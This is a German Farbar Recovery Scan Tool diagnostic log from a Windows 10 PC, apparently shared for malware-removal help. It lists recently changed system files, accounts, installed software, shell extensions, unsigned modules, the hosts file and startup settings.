2021-01-14 16:19 - 2019-12-07 15:51 - 000142222 _____ C:\Windows\system32\perfc007.dat
2021-01-14 16:19 - 2019-12-07 10:12 - 000000000 ____D C:\Windows\INF
2021-01-14 16:14 - 2020-11-19 00:40 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2021-01-14 16:14 - 2019-12-07 10:03 - 000262144 _____ C:\Windows\system32\config\BBI
2021-01-14 16:06 - 2019-12-07 10:14 - 000000000 ___HD C:\Windows\ELAMBKUP
2021-01-14 15:35 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\AppReadiness
2021-01-14 15:24 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\Performance
2021-01-14 15:15 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\SystemResources
2021-01-14 15:15 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\PolicyDefinitions
2021-01-14 15:12 - 2019-12-07 10:03 - 000000000 ____D C:\Windows\CbsTemp
2021-01-14 14:37 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\Help
2021-01-13 14:07 - 2020-11-18 23:40 - 000000000 ____D C:\Windows\system32\SleepStudy
2021-01-12 12:19 - 2020-11-19 00:42 - 000003700 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-12 12:19 - 2020-11-19 00:42 - 000003576 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-01-11 12:45 - 2019-12-07 10:09 - 000494592 _____ (Microsoft Corporation) C:\Windows\system32\dpnet.dll
2021-01-11 12:45 - 2019-12-07 10:09 - 000383488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnet.dll
2021-01-11 12:45 - 2019-12-07 10:09 - 000215552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dplayx.dll
2021-01-11 12:45 - 2019-12-07 10:09 - 000070656 _____ (Microsoft Corporation) C:\Windows\system32\dpnathlp.dll
2021-01-11 12:45 - 2019-12-07 10:09 - 000060928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnathlp.dll
2021-01-11 12:45 - 2019-12-07 10:09 - 000045568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpwsockx.dll
2021-01-11 12:45 - 2019-12-07 10:09 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\dpnsvr.exe
2021-01-11 12:45 - 2019-12-07 10:09 - 000023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpmodemx.dll
2021-01-11 12:45 - 2019-12-07 10:09 - 000022528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnsvr.exe
2021-01-11 12:45 - 2019-12-07 10:09 - 000020480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dplaysvr.exe
2021-01-11 12:45 - 2019-12-07 10:09 - 000010240 _____ (Microsoft Corporation) C:\Windows\system32\dpnhupnp.dll
2021-01-11 12:45 - 2019-12-07 10:09 - 000010240 _____ (Microsoft Corporation) C:\Windows\system32\dpnhpast.dll
2021-01-11 12:45 - 2019-12-07 10:09 - 000008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnhupnp.dll
2021-01-11 12:45 - 2019-12-07 10:09 - 000008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnhpast.dll
2021-01-11 12:45 - 2019-12-07 10:09 - 000006144 _____ (Microsoft Corporation) C:\Windows\system32\dpnlobby.dll
2021-01-11 12:45 - 2019-12-07 10:09 - 000006144 _____ (Microsoft Corporation) C:\Windows\system32\dpnaddr.dll
2021-01-11 12:45 - 2019-12-07 10:09 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnlobby.dll
2021-01-11 12:45 - 2019-12-07 10:09 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnaddr.dll
2021-01-11 09:12 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\LiveKernelReports
2021-01-09 18:13 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\ServiceState
2021-01-09 18:04 - 2020-11-19 00:44 - 000000000 __RHD C:\Users\Public\AccountPictures
2021-01-09 18:04 - 2019-12-07 10:14 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2021-01-09 14:54 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-09 13:01 - 2020-11-19 00:42 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-09 12:58 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\appcompat
2021-01-08 15:59 - 2020-11-19 00:44 - 000000000 ____D C:\ProgramData\Packages
2021-01-08 15:51 - 2019-12-07 15:54 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-08 15:51 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\SysWOW64\Dism
2021-01-08 15:51 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\migwiz
2021-01-08 15:51 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\Dism
2021-01-08 15:51 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\bcastdvr
2021-01-08 15:51 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-08 15:51 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2021-01-08 15:36 - 2019-12-07 10:03 - 000000000 ____D C:\Windows\servicing
2021-01-08 15:29 - 2020-11-19 00:40 - 000000000 ____D C:\Windows\system32\Drivers\wd
2021-01-08 13:29 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2021-01-08 13:10 - 2019-12-07 10:14 - 000000000 ___SD C:\Windows\Downloaded Program Files
2021-01-08 11:42 - 2019-12-07 15:52 - 000000000 ____D C:\Windows\system32\FxsTmp
2021-01-08 11:42 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\USOPrivate
2021-01-08 11:42 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows NT
2021-01-08 11:40 - 2019-12-07 10:14 - 000000000 ___RD C:\Windows\PrintDialog
2021-01-08 11:39 - 2019-12-07 10:14 - 000028672 _____ C:\Windows\system32\config\BCD-Template

==================== FCheck ================================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

FCheck: C:\Windows\SysWOW64\version_IObitDel.dll [2021-01-08] <==== ACHTUNG (Null Byte Datei/Ordner)

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
         
Addition
Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021
durchgeführt von Teemida (14-01-2021 16:20:53)
Gestartet von C:\Users\dkads\Downloads
Windows 10 Pro N Version 20H2 19042.685 (X64) (2021-01-08 10:42:07)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-2574429152-671371520-428654442-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2574429152-671371520-428654442-503 - Limited - Disabled)
Gast (S-1-5-21-2574429152-671371520-428654442-501 - Limited - Disabled)
Teemida (S-1-5-21-2574429152-671371520-428654442-1001 - Administrator - Enabled) => C:\Users\dkads
WDAGUtilityAccount (S-1-5-21-2574429152-671371520-428654442-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Spybot - Search and Destroy (Disabled - Out of date) {F77C7796-45C4-531E-0DAE-B4A8229B11C8}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

AMD Chipset Software (HKLM-x32\...\AMD_Chipset_IODrivers) (Version: 2.10.13.408 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 20.12.1 - Advanced Micro Devices, Inc.)
AMD_Chipset_Drivers (HKLM-x32\...\{4fedae1b-6980-4848-9ba0-229c946a3dac}) (Version: 2.10.13.408 - Advanced Micro Devices, Inc.) Hidden
Black Mesa: Definitive Edition (HKLM-x32\...\Black Mesa: Definitive Edition_is1) (Version:  - )
Branding64 (HKLM\...\{856DA29A-EA4A-468B-BBC2-B5F60DD75BFE}) (Version: 1.00.0002 - Advanced Micro Devices, Inc.) Hidden
Brave (HKLM-x32\...\BraveSoftware Brave-Browser) (Version: 87.1.18.78 - Die Brave-Autoren)
Classic Shell (HKLM\...\{CABCE573-0A86-42FA-A52A-C7EA61D5BE08}) (Version: 4.3.1 - IvoSoft)
Control (HKLM-x32\...\Control_is1) (Version:  - )
Dark Souls 3 (HKLM-x32\...\Dark Souls 3_is1) (Version:  - )
Death Stranding (HKLM-x32\...\Death Stranding_is1) (Version:  - )
Discord (HKU\S-1-5-21-2574429152-671371520-428654442-1001\...\Discord) (Version: 0.0.309 - Discord Inc.)
Driver Booster 8 (HKLM-x32\...\Driver Booster_is1) (Version: 8.2.0 - IObit)
Epic Games Launcher (HKLM-x32\...\{07D9F8F3-EC99-4133-919D-DA341C62937C}) (Version: 1.1.298.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
f.lux (HKU\S-1-5-21-2574429152-671371520-428654442-1001\...\Flux) (Version:  - f.lux Software LLC)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 10.1.1.37576 - Foxit Software Inc.)
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.101.0 - Google LLC) Hidden
Grand Theft Auto San Andreas (HKLM-x32\...\Grand Theft Auto San Andreas_is1) (Version: 0.0.0 - DODI-Repacks)
Kingdom Come: Deliverance (HKLM-x32\...\Kingdom Come: Deliverance_is1) (Version:  - )
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Malwarebytes version 4.3.0.98 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.3.0.98 - Malwarebytes)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.65 - )
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50918.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 (HKLM-x32\...\{6913e92a-b64e-41c9-a5e6-cef39207fe89}) (Version: 14.25.28508.3 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (HKLM-x32\...\{49697869-be8e-427d-81a0-c334d1d14950}) (Version: 14.21.27702.2 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 de) (HKU\S-1-5-21-2574429152-671371520-428654442-1001\...\Mozilla Firefox 84.0.2 (x64 de)) (Version: 84.0.2 - Mozilla)
Nexus (HKLM-x32\...\Winstep Xtreme_is1) (Version:  - )
NieR: Automata (HKLM-x32\...\NieR: Automata_is1) (Version:  - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
PeaZip 7.6.0 (WIN64) (HKLM\...\{5A2BC38A-406C-4A5B-BF45-6991F9A05325}_is1) (Version: 7.6.0 - Giorgio Tani)
PeerBlock 1.2 (r693) (HKLM\...\{015C5B35-B678-451C-9AEE-821E8D69621C}_is1) (Version: 1.2.0.693 - PeerBlock, LLC)
Planet Zoo (HKLM-x32\...\Planet Zoo_is1) (Version:  - )
Portal Collection (HKLM-x32\...\Portal Collection_is1) (Version:  - )
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 4.0.17.0 - Goversoft LLC)
Promontory_GPIO Driver (HKLM-x32\...\{B5512BCC-F4CD-4159-86A4-B2AD7D38FFA9}) (Version: 2.0.1.0 - Advanced Micro Devices, Inc.) Hidden
ProtonVPN (HKLM-x32\...\{CC56589D-2FE8-4B38-9024-0ABCD9F3CB0E}) (Version: 1.16.1 - Proton Technologies AG) Hidden
ProtonVPN (HKLM-x32\...\ProtonVPN 1.16.1) (Version: 1.16.1 - Proton Technologies AG)
ProtonVPNTap (HKLM-x32\...\{BCB82CD9-F514-4F93-A6D9-F898494DC927}) (Version: 1.1.0 - Proton Technologies AG)
qBittorrent 4.3.2 (HKLM-x32\...\qBittorrent) (Version: 4.3.2 - The qBittorrent project)
Shark007 STANDARD Codecs (HKLM-x32\...\{898E81AD-6DB9-4750-866B-B8958C5DC7AA}) (Version: 10.9.1.0 - Shark007)
Shark007 STANDARD x64Components (HKLM\...\STANDARD x64Components_is1) (Version: 10.9.1.0 - Shark007)
Spine (HKLM-x32\...\Spine) (Version: 1.26.3 - Clockwork Origins)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeraCopy version 3.5 (HKLM\...\TeraCopy_is1) (Version: 3.5 - Code Sector)
The Elder Scrolls: Skyrim SE (HKLM-x32\...\The Elder Scrolls: Skyrim SE_is1) (Version:  - )
VLC media player (HKLM\...\VLC media player) (Version: 3.0.11 - VideoLAN)
Wise Care 365 5.6.2 (HKLM-x32\...\Wise Care 365_is1) (Version: 5.6.2 - WiseCleaner.com, Inc.)
Wolfenstein II (HKLM-x32\...\Wolfenstein II_is1) (Version:  - )

Packages:
=========
Cortana -> C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe [2021-01-09] (Microsoft Corporation)
Ihr Smartphone -> C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe [2019-12-07] (Microsoft Corporation)
Mail und Kalender -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe [2021-01-09] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1808.3.0_x64__8wekyb3d8bbwe [2019-12-07] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe [2019-12-07] (Microsoft Studios) [MS Ad]
Microsoft Wireless Display Adapter -> C:\Program Files\WindowsApps\Microsoft.SurfaceWirelessDisplayAdapter_4.227.139.0_x64__8wekyb3d8bbwe [2021-01-08] (Microsoft Corporation) [Startup Task]
MSN Wetter -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe [2019-12-07] (Microsoft Corporation) [MS Ad]

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ShellIconOverlayIdentifiers: [ShareOverlay] -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer64.dll [2018-07-15] (Ivaylo Beltchev -> IvoSoft) [Datei ist nicht signiert]
ShellIconOverlayIdentifiers-x32: [ShareOverlay] -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer64.dll [2018-07-15] (Ivaylo Beltchev -> IvoSoft) [Datei ist nicht signiert]
ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-08] (Goversoft LLC -> )
ContextMenuHandlers1: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2016-12-07] (Code Sector -> )
ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-08] (Goversoft LLC -> )
ContextMenuHandlers2: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2016-12-07] (Code Sector -> )
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-01-14] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-08] (Goversoft LLC -> )
ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-08] (Goversoft LLC -> )
ContextMenuHandlers4: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2016-12-07] (Code Sector -> )
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Windows\System32\atiacm64.dll [2020-12-07] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-01-14] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-08] (Goversoft LLC -> )
ContextMenuHandlers6: [StartMenuExt] -> {E595F05F-903F-4318-8B0A-7F633B520D2B} => C:\Windows\system32\StartMenuHelper64.dll [2018-07-15] (Ivaylo Beltchev -> IvoSoft) [Datei ist nicht signiert]
ContextMenuHandlers6: [TeraCopy] -> {A8005AF0-D6E8-48AF-8DFA-023B1CF660A7} => C:\Program Files\TeraCopy\TeraCopyExt.dll [2016-12-07] (Code Sector -> )

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

WMI:subscription\LogFileEventConsumer->ELD::
WMI:subscription\LogFileEventConsumer->Ephedra::

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

2020-07-27 13:58 - 2020-07-27 13:58 - 000017920 _____ () [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\libEGL.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 003567616 _____ () [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2021-01-08 14:39 - 2020-11-13 17:53 - 002116096 _____ () [Datei ist nicht signiert] C:\Program Files\TeraCopy\TeraCopy64.dll
2020-12-04 06:51 - 2020-12-04 06:51 - 001470976 _____ (Advanced Micro Devices, Inc.) [Datei ist nicht signiert] C:\Program Files\AMD\WVR\OpenVR\bin\win64\driver_amdwvr.dll
2018-07-15 13:15 - 2018-07-15 13:15 - 000885560 _____ (Ivaylo Beltchev -> IvoSoft) [Datei ist nicht signiert] C:\Program Files\Classic Shell\ClassicExplorer64.dll
2018-07-15 13:15 - 2018-07-15 13:15 - 003664696 _____ (Ivaylo Beltchev -> IvoSoft) [Datei ist nicht signiert] C:\Program Files\Classic Shell\ClassicStartMenuDLL.dll
2018-07-15 13:15 - 2018-07-15 13:15 - 000291128 _____ (Ivaylo Beltchev -> IvoSoft) [Datei ist nicht signiert] C:\Windows\system32\StartMenuHelper64.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 001189888 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\plugins\sqldrivers\qsqlite.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 006184448 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\Qt5Core.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 006867456 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\Qt5Gui.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 001104896 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\Qt5Network.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 000325120 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\Qt5Positioning.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 003668480 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\Qt5Qml.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 000517120 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\Qt5QmlModels.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 004228608 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\Qt5Quick.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 000205824 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\Qt5Sql.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 000127488 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\Qt5WebChannel.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 000390656 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\Qt5WebEngine.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 095598080 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\Qt5WebEngineCore.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 005587968 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\Qt5Widgets.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 000462848 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\Qt5WinExtras.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 000188928 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\Qt5Xml.dll
2020-07-27 13:58 - 2020-07-27 13:58 - 002878464 _____ (The Qt Company Ltd.) [Datei ist nicht signiert] C:\Program Files\AMD\CNext\CNext\Qt5XmlPatterns.dll
2021-01-08 15:17 - 2017-11-24 17:43 - 000026624 _____ (Winstep Software Technologies) [Datei ist nicht signiert] C:\Program Files (x86)\Winstep\WsxMMTimer.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
BHO: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer64.dll [2018-07-15] (Ivaylo Beltchev -> IvoSoft) [Datei ist nicht signiert]
BHO: ClassicIEBHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIEDLL_64.dll [2018-07-15] (Ivaylo Beltchev -> IvoSoft) [Datei ist nicht signiert]
BHO-x32: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer32.dll [2018-07-15] (Ivaylo Beltchev -> IvoSoft) [Datei ist nicht signiert]
BHO-x32: ClassicIEBHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIEDLL_32.dll [2018-07-15] (Ivaylo Beltchev -> IvoSoft) [Datei ist nicht signiert]
Toolbar: HKLM - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll [2018-07-15] (Ivaylo Beltchev -> IvoSoft) [Datei ist nicht signiert]
Toolbar: HKLM-x32 - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll [2018-07-15] (Ivaylo Beltchev -> IvoSoft) [Datei ist nicht signiert]

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2019-12-07 10:14 - 2021-01-08 12:16 - 000000822 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1       localhost

2021-01-08 15:46 - 2021-01-08 16:07 - 000000512 _____ C:\Windows\system32\drivers\etc\hosts.ics
192.168.137.1 DESKTOP-V80PEH8.mshome.net # 2026 1 3 7 15 7 23 438
192.168.137.153 tv8e5ccdbcd1d7.mshome.net # 2021 1 5 15 15 7 23 438

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-2574429152-671371520-428654442-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\dkads\Desktop\Programme\Wallpaper\66yo2opn0vl51.png
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
 ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

MSCONFIG\Services: FoxitReaderUpdateService => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: WiseBootAssistant => 2
HKLM\...\StartupApproved\Run: => "SecurityHealth"
HKU\S-1-5-21-2574429152-671371520-428654442-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-2574429152-671371520-428654442-1001\...\StartupApproved\Run: => "Discord"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

